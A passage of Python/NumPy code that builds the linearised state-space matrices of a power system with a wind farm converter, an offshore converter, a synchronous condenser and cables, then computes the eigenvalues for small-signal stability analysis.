vwfx * np.sin(thetaw) - vwfy * np.cos(thetaw) - wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Lt,
-npr.wn * wf.Ki_pll * wf.Kpc * wf.Kpf * wf.Kpp / wf.Lt, npr.wn * wf.Kif * wf.Kpc * wf.Kpp / wf.Lt,
npr.wn * wf.Kip * wf.Kpc / wf.Lt, 0, -npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.sin(thetaw) - np.cos(thetaw)) / wf.Lt,
npr.wn * (-wf.Kp_pll * wf.Kpc * wf.Kpf * wf.Kpp * np.cos(thetaw) - np.sin(thetaw)) / wf.Lt, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0, npr.wn * wf.Kic / wf.Lt, 0,
npr.wn / wf.Lt, npr.wn * (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Lt, 0, 0, 0,
npr.wn * wf.Kiq * wf.Kpc / wf.Lt, 0, npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt,
npr.wn * wf.Kpc * wf.Kpq * wf.Kv / wf.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * np.sin(thetaw) / wf.Lt, -npr.wn * np.cos(thetaw) / wf.Lt, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * wf.Kpp * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)),
-wf.Ki_pll * wf.Kpf * wf.Kpp, wf.Kif * wf.Kpp, wf.Kip, 0, -wf.Kpp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * wf.Kpf * wf.Kpp * np.sin(thetaw),
-wf.Kp_pll * wf.Kpf * wf.Kpp * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kiq, 0, wf.Kpq * wf.Kq, wf.Kpq * wf.Kv,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad, 0,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, np.cos(thetaw) / wf.Tad, np.sin(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / wf.Tad,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw) / wf.Tad, np.cos(thetaw) / wf.Tad, 0, 0, 0, 0,
0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), npr.wn * wf.Ki_pll, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-npr.wn * wf.Kp_pll * np.sin(thetaw), npr.wn * wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw), 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -np.sin(thetaw),
np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kp_pll * np.sin(thetaw),
-wf.Kp_pll * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-wf.Kp_pll * wf.Kpf * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)), -wf.Ki_pll * wf.Kpf, wf.Kif,
0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
wf.Kp_pll * wf.Kpf * np.sin(thetaw), -wf.Kp_pll * wf.Kpf * np.cos(thetaw), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, wf.Kq, wf.Kv, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, (vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / wf.Tpm,
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) + Iqw * (
-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw))) / wf.Tpm, 0, 0, 0, 0, -1 / wf.Tpm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm,
(Idw * np.sin(thetaw) + Iqw * np.cos(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, (-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) / wf.Tpm,
(-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, (
Idw * (-vwfx * np.cos(thetaw) - vwfy * np.sin(thetaw)) - Iqw * (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw))) / wf.Tpm, 0, 0, 0, 0, 0,
-1 / wf.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / wf.Tpm,
(Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / wf.Tpm, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * vwfx * np.sin(thetaw) + 2 * vwfy * np.cos(thetaw)) * (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) / 2 + (
-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * (
-2 * vwfx * np.cos(thetaw) - 2 * vwfy * np.sin(thetaw)) / 2) / (
wf.Tvm * np.sqrt((-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0, -1 / wf.Tvm,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
-(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.sin(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.cos(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), (
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) * np.cos(thetaw) + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) * np.sin(thetaw)) / (wf.Tvm * np.sqrt(
(-vwfx * np.sin(thetaw) + vwfy * np.cos(thetaw)) ** 2 + (
vwfx * np.cos(thetaw) + vwfy * np.sin(thetaw)) ** 2)), 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt, 0,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao)) + voffx * np.sin(
thetao) - voffy * np.cos(thetao)) / off.Lt,
-npr.wn * off.Ki_pll * off.Kpc * off.Kpf * off.Kpp / off.Lt,
npr.wn * off.Kif * off.Kpc * off.Kpp / off.Lt, npr.wn * off.Kip * off.Kpc / off.Lt, 0,
-npr.wn * off.Kpc * off.Kpp / off.Lt, 0, 0,
npr.wn * (off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.sin(thetao) - np.cos(thetao)) / off.Lt,
npr.wn * (-off.Kp_pll * off.Kpc * off.Kpf * off.Kpp * np.cos(thetao) - np.sin(thetao)) / off.Lt, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * (-off.Kpc - off.Rt) / off.Lt, 0, npr.wn * off.Kic / off.Lt, 0, npr.wn / off.Lt,
npr.wn * (voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Lt, 0, 0, 0,
npr.wn * off.Kiq * off.Kpc / off.Lt, 0, npr.wn * off.Kpc * off.Kpq * off.Kq / off.Lt,
npr.wn * off.Kpc * off.Kpq * off.Kv / off.Lt, npr.wn * np.sin(thetao) / off.Lt,
-npr.wn * np.cos(thetao) / off.Lt, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * off.Kpp * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)),
-off.Ki_pll * off.Kpf * off.Kpp, off.Kif * off.Kpp, off.Kip, 0, -off.Kpp, 0, 0,
off.Kp_pll * off.Kpf * off.Kpp * np.sin(thetao), -off.Kp_pll * off.Kpf * off.Kpp * np.cos(thetao), 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0,
off.Kiq, 0, off.Kpq * off.Kq, off.Kpq * off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / off.Tad, 0,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
np.cos(thetao) / off.Tad, np.sin(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / off.Tad,
(-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tad, 0, 0, 0, 0, 0, 0, 0,
-np.sin(thetao) / off.Tad, np.cos(thetao) / off.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), npr.wn * off.Ki_pll, 0, 0,
0, 0, 0, 0, -npr.wn * off.Kp_pll * np.sin(thetao), npr.wn * off.Kp_pll * np.cos(thetao), 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-voffx * np.cos(thetao) - voffy * np.sin(thetao), 0, 0, 0, 0, 0, 0, 0, -np.sin(thetao),
np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll, 0, 0, 0, 0, 0, 0,
off.Kp_pll * np.sin(thetao), -off.Kp_pll * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-off.Kp_pll * off.Kpf * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)), -off.Ki_pll * off.Kpf,
off.Kif, 0, 0, -1, 0, 0, off.Kp_pll * off.Kpf * np.sin(thetao),
-off.Kp_pll * off.Kpf * np.cos(thetao), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, off.Kq, off.Kv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(voffx * np.cos(thetao) + voffy * np.sin(thetao)) / off.Tpm,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.sin(thetao) + voffy * np.cos(thetao)) + Iqo * (
-voffx * np.cos(thetao) - voffy * np.sin(thetao))) / off.Tpm, 0, 0, 0, 0,
-1 / off.Tpm, 0, 0, (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm,
(Ido * np.sin(thetao) + Iqo * np.cos(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) / off.Tpm,
(-voffx * np.cos(thetao) - voffy * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, (
Ido * (-voffx * np.cos(thetao) - voffy * np.sin(thetao)) - Iqo * (
-voffx * np.sin(thetao) + voffy * np.cos(thetao))) / off.Tpm, 0, 0, 0, 0, 0,
-1 / off.Tpm, 0, (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / off.Tpm,
(Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / off.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (
(-2 * voffx * np.sin(thetao) + 2 * voffy * np.cos(thetao)) * (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) / 2 + (
-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * (
-2 * voffx * np.cos(thetao) - 2 * voffy * np.sin(thetao)) / 2) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0,
-1 / off.Tvm, (-(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.sin(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.cos(thetao)) / (off.Tvm * np.sqrt(
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), (
(-voffx * np.sin(thetao) + voffy * np.cos(thetao)) * np.cos(thetao) + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) * np.sin(thetao)) / (
off.Tvm * np.sqrt((-voffx * np.sin(thetao) + voffy * np.cos(thetao)) ** 2 + (
voffx * np.cos(thetao) + voffy * np.sin(thetao)) ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb),
-npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (-Ido * np.sin(thetao) - Iqo * np.cos(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Chub, 0, npr.wn / Chub, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
npr.wn * off.Sn * np.sin(thetao) / (Chub * npr.Sb),
npr.wn * off.Sn * np.cos(thetao) / (Chub * npr.Sb), 0, 0, 0, 0,
npr.wn * off.Sn * (Ido * np.cos(thetao) - Iqo * np.sin(thetao)) / (Chub * npr.Sb), 0, 0, 0, 0, 0, 0,
0, -npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Chub, 0, npr.wn / Chub, 0, 0],
[gpr.Sn * npr.wn * ((-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (-gpr.ra * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta))) * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta)) - gpr.xqpp * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta))) * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta)) + gpr.xdpp * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta))) * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (
Csc * npr.Sb), 0, 0, gpr.Sn * npr.wn * (
-gpr.ra * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xqpp * np.cos(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, gpr.Sn * npr.wn * (
gpr.ra * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xdpp * np.sin(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, gpr.Sn * npr.wn * (
-(gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * np.cos(delta) + gpr.xqpp * np.sin(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), npr.wn * (gpr.Sn * (
(-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / npr.Sb + Csc) / Csc, 0, 0, 0, 0,
-npr.wn / Csc, 0, 0, 0, 0, 0],
[gpr.Sn * npr.wn * ((-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (-gpr.ra * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta))) * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta)) - gpr.xqpp * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta))) * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(
delta)) + gpr.xdpp * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta))) * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (
Csc * npr.Sb), 0, 0, gpr.Sn * npr.wn * (
gpr.ra * np.cos(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xqpp * np.sin(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, gpr.Sn * npr.wn * (
gpr.ra * np.sin(delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - gpr.xdpp * np.cos(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (gpr.Sn * (
(gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * np.cos(delta) + gpr.xqpp * np.sin(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / npr.Sb - Csc) / Csc, gpr.Sn * npr.wn * (
(-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (
-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / (Csc * npr.Sb), 0, 0, 0, 0, 0,
-npr.wn / Csc, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, -npr.wn / Ccb, 0, npr.wn / Ccb, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, -npr.wn / Ccb, 0, npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb),
-npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, -npr.wn / Ccb,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb),
npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0,
-npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, -npr.wn / Ltsc, 0, npr.wn / Ltsc, 0, 0, 0, 0, 0, -Rtsc * npr.wn / Ltsc, npr.wn, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, -npr.wn / Ltsc, 0, npr.wn / Ltsc, 0, 0, 0, 0, -npr.wn, -Rtsc * npr.wn / Ltsc, 0, 0, 0,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, 0, 0, -Rtwf * npr.wn / Ltwf, npr.wn, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, 0, -npr.wn, -Rtwf * npr.wn / Ltwf, 0,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, -npr.wn / Lcb, 0, npr.wn / Lcb, 0, 0, 0, 0, 0, -Rcb * npr.wn / Lcb, npr.wn],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, -npr.wn / Lcb, 0, npr.wn / Lcb, 0, 0, 0, 0, -npr.wn, -Rcb * npr.wn / Lcb],
])
# A[6,:] = A[6,:]*0
# A[7,:] = A[7,:]*0
# A[8,:] = A[8,:]*0
B = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0],
[0, -npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt],
[wf.Kpp, 0],
[0, -wf.Kpq * wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 0],
[0, -wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
])
C = np.zeros((2, 51))
D = np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
Amat = A # -B@np.linalg.inv(D)@C
lambda_1, Phi_1 = np.linalg.eig(Amat)
